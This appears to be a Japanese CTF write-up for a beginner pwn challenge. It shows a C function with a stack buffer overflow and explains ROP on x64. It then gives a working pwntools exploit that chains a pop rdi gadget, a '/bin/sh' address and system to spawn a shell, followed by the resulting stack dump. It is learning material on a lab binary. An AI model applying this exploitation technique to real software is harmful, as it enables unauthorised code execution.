void show_stack(void *);
void vuln();

int main() {
    vuln();
}

void vuln() {
    char buf[BUFF_SIZE] = {0};
    show_stack(buf);
    puts("You can earn points by submitting the contents of flag.txt");
    puts("Did you understand?") ;
    read(0, buf, 0x30);
    puts("bye!");
    show_stack(buf);
}

ROPですね。名前から自明なようですが脆弱性を含むのはvuln関数です。BUFF_SIZEが0x10であるのに対し、readで0x30読んでしまうという脆弱性を利用してスタックオーバーフローを狙いリターンアドレスを書き換えてシェルを狙います。rbpがあるので、リターンアドレス以降の0x18バイトを書き換えることができます。ROPでやりたいことはシェルを呼び出すように仕向けることです。そのためには"/bin/sh"を引数としてsystemやexecveなどを呼び出す必要があります。systemを呼び出す命令についてはhelp関数内でsystemが呼ばれていますね。gdbでdisas helpして0x00000000004011e5がその部分であることがわかります。そして、「引数を渡す」というのは、x64では以下のようにして行う必要があります。

1. 第 1 引数 を rdi に設定
2. 第 2 引数 を rsi に設定
3. 第 3 引数 を rdx に設定
4. 第 4 引数 を r10 に設定
5. 第 5 引数 を r8 に設定
6. 第 6 引数 を r9 に設定

ちなみに、システムコール命令を使うならrax にシステムコール番号を設定して syscall を実行するわけですが今回はsystem関数のアドレスがわかるので今回は使用しません。では問題に戻りましょう。引数を渡すのに使える命令をROPgadgetで探します。ここではsyscallの引数として"/bin/sh"を渡せばいいわけですから、"/bin/sh"の文字列はエクスプロイトコードのなかで用意するとして、それを第一引数にするにはpop rdi ; retを呼べばよいです。そして欠けている情報がもう一つ、「popしてrdiに渡す"/bin/sh"のアドレス」です。問題の出力でsaved rbpが書いてくれているので、ここからスタックサイズを引けばスタックの先頭アドレスがわかるので、ここに"/bin/sh"を格納しておけばよいです。ごちゃごちゃしてきましたが、結局このような積み方をすればよいはずです。

あとはこのようなペイロードを送りつけるプログラムを書いていきます。saved rbpは実行毎に変わるので実行結果から取得する必要があります。

from pwn import *

pc = process("./chall")

pc.recvuntil(b"000002 | ")
saved_rbp = int(pc.recv(18), 16)
print(hex(saved_rbp))
binsh_addr = saved_rbp - 0x20
pop_rdi = 0x0000000000401453
system_addr = 0x00000000004011e5

payload = b'/bin/sh\x00'
payload += b'a' * 16 # stack_show()の実行結果から数えました。
# 0x30...読み込むサイズ、0x10...バッファのサイズ、0x8...アドレスのサイズなので
# payload += b'a' * (0x30 - 0x10 - 0x8 - len(payload) とかでもいいですね

payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
pc.sendafter(b'understand?\n', payload)
pc.interactive()

実行結果は以下のようになり、シェルが取れます。saved ret addrのvalueが、pop rdi; retのアドレスになっているのがポイントです。

[Index] |[Value]             
========+===================
 000000 | 0x0068732f6e69622f  <- buf
 000001 | 0x6161616161616161 
 000002 | 0x6161616161616161  <- saved rbp
 000003 | 0x0000000000401453  <- saved ret addr
 000004 | 0x00007ffe13a7b8b0 

感想

pwnableについては初心者向けのCTFにおいてはスタック系の問題は見当がつくようになってきたのでヒープ系の問題にも手を出していきたいです（pwnはなんとなくロードマップみたいなものを意識できるようになってきたので常設でも挑戦する問題にあたりがつけられそうです）。reversingはまだ出たとこ勝負な感じがあります。とりあえずgdbとghidraは手足のように扱えるようになっておくべき...。コンテスト中に取り組んだのはこの4問だけでした。そのうち解ききれなかった問題も理解できたら解説をまとめてアップしようかなと思います（書けたら書く）。